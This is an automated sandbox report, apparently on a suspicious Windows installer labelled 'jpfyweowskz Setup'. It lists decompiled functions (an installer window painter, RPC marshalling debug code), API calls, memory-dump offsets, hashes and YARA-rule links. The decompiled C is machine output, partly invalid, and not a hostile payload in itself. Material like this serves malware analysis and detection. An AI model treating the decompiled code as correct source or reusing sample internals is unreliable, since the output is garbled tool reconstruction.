                                                                                                • String ID: N$cegrwbhzuj$open$=`
                                                                                                • API String ID: 3615053054-2851761242
                                                                                                • Opcode ID: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                                                                                • Instruction ID: ff75cf5183ce2723ba3e9af3fd3b1123c83c1709a93184edc862a5803e63a157
                                                                                                • Opcode Fuzzy Hash: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                                                                                • Instruction Fuzzy Hash: 3861CEB1A40209BFEB109F60CD45F6A7B69EB44715F10843AFB05BA2D1C7B8AD51CF98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 90%
                                                                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42eb70; // 0x5ff628
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "jpfyweowskz Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42eb68; // 0x9023e
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                                                                                0x0040100a
                                                                                                0x00401039
                                                                                                0x00401047
                                                                                                0x0040104d
                                                                                                0x00401051
                                                                                                0x0040105b
                                                                                                0x00401061
                                                                                                0x00401064
                                                                                                0x004010f3
                                                                                                0x00401089
                                                                                                0x0040108c
                                                                                                0x004010a6
                                                                                                0x004010bd
                                                                                                0x004010cc
                                                                                                0x004010cf
                                                                                                0x004010d5
                                                                                                0x004010d9
                                                                                                0x004010e4
                                                                                                0x004010ed
                                                                                                0x004010ef
                                                                                                0x004010ef
                                                                                                0x00401100
                                                                                                0x00401105
                                                                                                0x0040110d
                                                                                                0x00401110
                                                                                                0x00401112
                                                                                                0x00401118
                                                                                                0x0040111f
                                                                                                0x00401126
                                                                                                0x00401130
                                                                                                0x00401142
                                                                                                0x00401156
                                                                                                0x00401160
                                                                                                0x00401165
                                                                                                0x00401165
                                                                                                0x00401110
                                                                                                0x0040116e
                                                                                                0x00000000
                                                                                                0x00401178
                                                                                                0x00401010
                                                                                                0x00401013
                                                                                                0x00401015
                                                                                                0x00401019
                                                                                                0x0040101f
                                                                                                0x0040101f
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                • GetClientRect.USER32 ref: 0040105B
                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                • FillRect.USER32 ref: 004010E4
                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                • DrawTextA.USER32(00000000,jpfyweowskz Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                • String ID: F$jpfyweowskz Setup
                                                                                                • API String ID: 941294808-1867152740
                                                                                                • Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                                                                                • Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
                                                                                                • Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                                                                                • Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAB580, Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 331COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (%p,%p,%p,%p,%p,%d)$FC_ALLOCATE_ALL_NODES not implemented$client$deref => %p$free object pointer %p$no unmarshaller for data type=%02x$pointer=%p$pointer_id is 0x%08x$pointer_id is 0x%08x$pointer_id is 0x%08x$server$setting *pPointer to %p$type=0x%x, attr=$unhandled ptr type=%02x
                                                                                                • API String ID: 0-2416840215
                                                                                                • Opcode ID: b161a4b9c2e8f7a7e5b7c543bc988a5fd5f1b4454f2ca7b5f41f33fdc5cfa5e8
                                                                                                • Instruction ID: eb2b23abd8b1f0c77118c812347e20ee2bc558c24ad6b18a64d323f480f32922
                                                                                                • Opcode Fuzzy Hash: b161a4b9c2e8f7a7e5b7c543bc988a5fd5f1b4454f2ca7b5f41f33fdc5cfa5e8
                                                                                                • Instruction Fuzzy Hash: EFD1CCB190025A9FDB04CF99C891BBEBBB1EF49301F048169E9919B385D338DA51DBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA8F30, Relevance: 24.8, APIs: 1, Strings: 13, Instructions: 344COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memmove
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d <= %p$double=%f <= %p$enum16=%d <= %p$float=%f <= %p$long=%d <= %p$longlong=%s <= %p$pStubMsg->Buffer after %p$pStubMsg->Buffer before %p$pointer=%p <= %p$short=%d <= %p$unhandled format 0x%02x
                                                                                                • API String ID: 4056999889-2655958773
                                                                                                • Opcode ID: 74b008b2a808d858fc21f6c255152342aa3a79eb7d73902f65ecd6a891f7cd8a
                                                                                                • Instruction ID: c63b5f400f4f4310be93a2cfc853eeec36a04da47c15285c6c0e0f6f7b2f546e
                                                                                                • Opcode Fuzzy Hash: 74b008b2a808d858fc21f6c255152342aa3a79eb7d73902f65ecd6a891f7cd8a
                                                                                                • Instruction Fuzzy Hash: 32D13DB9A00109AFCB04CF98D890EAA7B76EF89354F14C518FE194F345E731EA51CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA9079, Relevance: 24.8, APIs: 1, Strings: 13, Instructions: 339COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 17%
                                                                                                			E6EDA9079(void* __eflags) {
				void* _t210;
				void* _t212;
				void* _t214;

				L0:
				while(1) {
					L0:
					 *(_t210 - 0x24) =  *( *(_t210 + 0xc));
					0x6eda0000("int3264=%ld <= %p\n",  *( *(_t210 + 0xc)),  *(_t210 + 0xc));
					E6EDAB030( *((intOrPtr*)(_t210 + 8)), _t210 - 0x24, 4);
					_t214 = _t212 + 0x18;
					 *(_t210 + 0xc) =  &(( *(_t210 + 0xc))[2]);
					while(1) {
						L44:
						 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
						L1:
						while(( *( *(_t210 + 0x10)) & 0x000000ff) != 0x5b) {
							 *(_t210 - 0xc) =  *( *(_t210 + 0x10)) & 0x000000ff;
							 *(_t210 - 0xc) =  *(_t210 - 0xc) - 1;
							if( *(_t210 - 0xc) > 0xb8) {
								L43:
								0x6eda0000("unhandled format 0x%02x\n",  *( *(_t210 + 0x10)) & 0x000000ff);
								_t214 = _t214 + 8;
								while(1) {
									L44:
									 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
									goto L1;
								}
							}
							L3:
							_t16 =  *(_t210 - 0xc) + 0x6eda94a4; // 0xcccccc0e
							switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M6EDA9464))) {
								case 0:
									L4:
									_push( *(_t210 + 0xc));
									_push( *( *(_t210 + 0xc)) & 0x0000ffff);
									_push("byte=%d <= %p\n");
									0x6eda0000();
									E6EDAB030( *((intOrPtr*)(_t210 + 8)),  *(_t210 + 0xc), 1);
									_t214 = _t214 + 0x18;
									 *(_t210 + 0xc) =  &(( *(_t210 + 0xc))[0]);
									L44:
									 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
									goto L1;
								case 1:
									L5:
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
									_push("short=%d <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 2);
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 2;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L44:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 2:
									L9:
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("long=%d <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L44:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 3:
									L10:
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									asm("cvtss2sd xmm0, [edx]");
									__esp = __esp - 8;
									asm("movsd [esp], xmm0");
									_push("float=%f <= %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 4);
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L44:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 4:
									L11:
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *(__ecx + 4);
									_push( *(__ecx + 4));
									__eax =  *__ecx;
									_push(__eax);
									0x6eda0000();
									__esp = __esp + 8;
									_push(__eax);
									_push("longlong=%s <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__edx =  *(__ebp + 8);
									E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 8) =  *(__ebp + 0xc);
									__eax =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									while(1) {
										L44:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 5:
									L12:
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__esp = __esp - 8;
									asm("movsd xmm0, [edx]");
									asm("movsd [esp], xmm0");
									_push("double=%f <= %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 8);
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									while(1) {
										L44:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 6:
									L6:
									__edx =  *(__ebp + 0xc);
									 *(__ebp - 4) =  *( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("enum16=%d <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									if( *( *(__ebp + 0xc)) > 0x7fff) {
										_push(0x6f5);
										__imp__RpcRaiseException();
									}
									L8:
									__edx = __ebp - 4;
									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8), __ebp - 4, 2);
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L44:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 7:
									L13:
									 *(__ebp - 0x18) = 0;
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("pointer=%p <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 8);
									__ecx =  *(__eax + 4);
									_push( *(__eax + 4));
									_push("pStubMsg->Buffer before %p\n");
									0x6eda0000();
									__esp = __esp + 8;
									__edx =  *(__ebp + 0x10);
									__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
										__ecx =  *(__ebp + 0x10);
										 *(__ebp + 0x14) =  *(__ebp + 0x10);
									}
									__edx =  *(__ebp + 0x14);
									__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
										__ecx =  *(__ebp + 8);
										__eax = E6EDA7400( *(__ebp + 8) + 4,  *(__ebp + 8) + 4, 4);
									}
									__edx =  *(__ebp + 8);
									__eax =  *(__edx + 4);
									 *(__ebp - 0x1c) =  *(__edx + 4);
									__ecx =  *(__ebp + 8);
									if( *( *(__ebp + 8) + 0x34) == 0) {
										__eax =  *(__ebp + 0x14);
										__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											__edx =  *(__ebp + 8);
											__eax = E6EDAAF00( *(__ebp + 8), 4);
										}
									} else {
										__edx =  *(__ebp + 8);
										__eax =  *(__ebp + 8);
										__ecx =  *(__eax + 0x34);
										 *( *(__ebp + 8) + 4) =  *(__eax + 0x34);
										__edx =  *(__ebp + 8);
										 *( *(__ebp + 8) + 0x34) = 0;
										 *(__ebp - 0x18) = 1;
									}
									__eax =  *(__ebp + 0x14);
									__ecx =  *(__ebp + 0xc);
									__edx =  *( *(__ebp + 0xc));
									__eax =  *(__ebp - 0x1c);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAB220( *(__ebp + 8),  *(__ebp - 0x1c),  *( *(__ebp + 0xc)),  *(__ebp + 0x14));
									if( *(__ebp - 0x18) == 0) {
										L27:
										__edx =  *(__ebp + 8);
										__eax =  *(__edx + 4);
										_push( *(__edx + 4));
										_push("pStubMsg->Buffer after %p\n");
										0x6eda0000();
										__esp = __esp + 8;
										__ecx =  *(__ebp + 0x10);
										__edx =  *__ecx & 0x000000ff;
										if(( *__ecx & 0x000000ff) != 0x36) {
											__ecx =  *(__ebp + 0x10);
											__ecx =  *(__ebp + 0x10) + 4;
											 *(__ebp + 0x10) = __ecx;
										} else {
											 *(__ebp + 0x14) =  *(__ebp + 0x14) + 4;
											 *(__ebp + 0x14) =  *(__ebp + 0x14) + 4;
										}
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										while(1) {
											L44:
											 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
											goto L1;
										}
									} else {
										do {
											L22:
											__edx =  *(__ebp + 8);
											__eax =  *(__edx + 0x14);
											_push( *(__edx + 0x14));
											__ecx =  *(__ebp + 8);
											__edx =  *( *(__ebp + 8));
											__eax =  *(__ebp + 8);
											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
											_push( *(__eax + 4) -  *(__edx + 8));
											_push("buffer=%d/%d\n");
											0x6eda0000();
											__esp = __esp + 0xc;
											__edx =  *(__ebp + 8);
											__eax =  *( *(__ebp + 8));
											__ecx =  *(__eax + 8);
											__edx =  *(__ebp + 8);
											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
											__eax =  *(__ebp + 8);
											if( *( *(__ebp + 8) + 4) > __ecx) {
												__ecx =  *(__ebp + 8);
												__edx =  *( *(__ebp + 8));
												__eax =  *(__edx + 8);
												__ecx =  *(__ebp + 8);
												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
												__edx =  *(__ebp + 8);
												__ecx =  *(__edx + 4);
												__ecx =  *(__edx + 4) - __eax;
												_push( *(__edx + 4) - __eax);
												_push("buffer overflow %d bytes\n");
												0x6eda0000();
												__esp = __esp + 8;
											}
											__edx = 0;
										} while (0 != 0);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 4);
										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp - 0x1c);
										 *( *(__ebp + 8) + 4) =  *(__ebp - 0x1c);
										__edx =  *(__ebp + 0x14);
										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											__ecx =  *(__ebp + 8);
											__eax = E6EDAAF00( *(__ebp + 8), 4);
										}
										goto L27;
									}
								case 8:
									L31:
									__eax =  *(__ebp - 0x10);
									__ecx = __ebp + 0xc;
									__eax = E6EDA7450(__ecx, __ecx,  *(__ebp - 0x10), 2);
									while(1) {
										L44:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 9:
									L32:
									__edx =  *(__ebp - 0x10);
									__ebp + 0xc = E6EDA7450(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 4);
									while(1) {
										L44:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 0xa:
									L33:
									__ecx =  *(__ebp - 0x10);
									__edx = __ebp + 0xc;
									__eax = E6EDA7450(__ecx, __ebp + 0xc, __ecx, 8);
									while(1) {
										L44:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 0xb:
									L34:
									__eax =  *(__ebp + 0x10);
									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
									__edx =  *(__ebp + 0xc);
									__eax = __edx + __ecx - 0x3c;
									 *(__ebp + 0xc) = __edx + __ecx - 0x3c;
									while(1) {
										L44:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 0xc:
									L35:
									1 = 1 << 0;
									__edx =  *(__ebp + 0x10);
									 *(__edx + (1 << 0)) & 0x000000ff = ( *(__edx + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0xc) = ( *(__edx + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									__edx =  *(__ebp + 0x10);
									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									__ecx =  *(__ebp - 8);
									__edx =  *(__ebp + 8);
									 *(__ebp - 0x20) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp - 0x20);
									_push( *(__ebp - 0x20));
									_push("embedded complex (size=%d) <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__edx =  *(__ebp - 8);
									__eax =  *( *(__ebp - 8)) & 0x000000ff;
									__eax =  *( *(__ebp - 8)) & 0x7f;
									__ecx =  *(0x6edbb218 + __eax * 4);
									 *(__ebp - 0x14) =  *(0x6edbb218 + __eax * 4);
									if( *(__ebp - 0x14) == 0) {
										__edx =  *(__ebp - 8);
										__eax =  *( *(__ebp - 8)) & 0x000000ff;
										_push( *( *(__ebp - 8)) & 0x000000ff);
										_push("no marshaller for embedded type %02x\n");
										0x6eda0000();
										__esp = __esp + 8;
									} else {
										__edx =  *(__ebp - 8);
										__eax =  *( *(__ebp - 8)) & 0x000000ff;
										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax =  *(__ebp + 0xc);
											_push( *(__ebp + 0xc));
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										} else {
											__ecx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__edx =  *(__ebp + 0xc);
											__eax =  *( *(__ebp + 0xc));
											_push( *( *(__ebp + 0xc)));
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										}
									}
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x20);
									 *(__ebp + 0xc) = __ecx;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									goto L1;
								case 0xd:
									L42:
									while(1) {
										L44:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 0xe:
									goto L0;
								case 0xf:
									goto L43;
							}
						}
						return  *(_t210 + 0xc);
					}
				}
			}






                                                                                                0x6eda9079
                                                                                                0x6eda9079
                                                                                                0x6eda9079
                                                                                                0x6eda907e
                                                                                                0x6eda9090
                                                                                                0x6eda90a2
                                                                                                0x6eda90a7
                                                                                                0x6eda90b0
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda8f3c
                                                                                                0x6eda8f51
                                                                                                0x6eda8f5a
                                                                                                0x6eda8f64
                                                                                                0x6eda943a
                                                                                                0x6eda9446
                                                                                                0x6eda944b
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x6eda944e
                                                                                                0x6eda8f6a
                                                                                                0x6eda8f6d
                                                                                                0x6eda8f74
                                                                                                0x00000000
                                                                                                0x6eda8f7b
                                                                                                0x6eda8f7e
                                                                                                0x6eda8f85
                                                                                                0x6eda8f86
                                                                                                0x6eda8f8b
                                                                                                0x6eda8f9d
                                                                                                0x6eda8fa2
                                                                                                0x6eda8fab
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda8fb3
                                                                                                0x6eda8fb3
                                                                                                0x6eda8fb6
                                                                                                0x6eda8fb7
                                                                                                0x6eda8fba
                                                                                                0x6eda8fbd
                                                                                                0x6eda8fbe
                                                                                                0x6eda8fc3
                                                                                                0x6eda8fc8
                                                                                                0x6eda8fcd
                                                                                                0x6eda8fd5
                                                                                                0x6eda8fdd
                                                                                                0x6eda8fe0
                                                                                                0x6eda8fe3
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9042
                                                                                                0x6eda9042
                                                                                                0x6eda9045
                                                                                                0x6eda9046
                                                                                                0x6eda9049
                                                                                                0x6eda904b
                                                                                                0x6eda904c
                                                                                                0x6eda9051
                                                                                                0x6eda9056
                                                                                                0x6eda905b
                                                                                                0x6eda9063
                                                                                                0x6eda906b
                                                                                                0x6eda906e
                                                                                                0x6eda9071
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda90b8
                                                                                                0x6eda90b8
                                                                                                0x6eda90bb
                                                                                                0x6eda90bc
                                                                                                0x6eda90bf
                                                                                                0x6eda90c3
                                                                                                0x6eda90c6
                                                                                                0x6eda90cb
                                                                                                0x6eda90d0
                                                                                                0x6eda90d5
                                                                                                0x6eda90da
                                                                                                0x6eda90de
                                                                                                0x6eda90e2
                                                                                                0x6eda90ed
                                                                                                0x6eda90f0
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda90f8
                                                                                                0x6eda90f8
                                                                                                0x6eda90fb
                                                                                                0x6eda90fc
                                                                                                0x6eda90ff
                                                                                                0x6eda9102
                                                                                                0x6eda9103
                                                                                                0x6eda9105
                                                                                                0x6eda9106
                                                                                                0x6eda910b
                                                                                                0x6eda910e
                                                                                                0x6eda910f
                                                                                                0x6eda9114
                                                                                                0x6eda9119
                                                                                                0x6eda911e
                                                                                                0x6eda9122
                                                                                                0x6eda912e
                                                                                                0x6eda9131
                                                                                                0x6eda9134
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda913c
                                                                                                0x6eda913c
                                                                                                0x6eda913f
                                                                                                0x6eda9140
                                                                                                0x6eda9143
                                                                                                0x6eda9146
                                                                                                0x6eda914a
                                                                                                0x6eda914f
                                                                                                0x6eda9154
